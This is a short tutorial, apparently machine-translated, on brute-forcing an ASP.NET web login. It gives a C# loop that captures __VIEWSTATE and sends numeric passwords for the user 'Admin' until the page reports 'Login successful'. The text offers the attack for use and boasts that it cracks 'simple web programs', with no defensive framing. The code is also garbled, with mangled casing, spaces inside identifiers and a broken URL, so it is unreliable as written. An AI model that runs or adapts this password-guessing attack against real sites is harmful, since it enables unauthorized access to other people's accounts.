Brute force cracking:Try one by one until the correct password is obtained.
The details are as follows:
Use httpwatch software for detection and select the file _ viewstate under the stream Tab
Then we create an application.Program:
Code
1 WebClient Web = New WebClient ();
2 Web. Encoding = Encoding. utf8;
3 For ( Int I = 0 ; I < 399 ; I ++ )
4 {
5 String S = Web. downloadstring ( " Http: // localhost: 2118/website5/default. aspx? _ Viewstate = % 2fwepdwukmtyznzq1ndcxn2rkg804yc5o9vry7xclcoo1% 2 fuinvau % 3d & txtname = Admin & txtpass = " + I. tostring () + " & Button1 = % E7 % 99% BB % E9 % 99% 86 & __ eventvalidation = % validate " );
6 If (S. Contains ( " Login successful " ))
7 {
8 Console. writeline ( " Password cracked: the password is: " + I. tostring ());
9 Break ;
10 }
11 }
12
13 Console. readkey ();
We can put the selected content in the downloadstring method of the WebClient object, and use "?" with our URL .
this way, you can crack simple web programs !!!!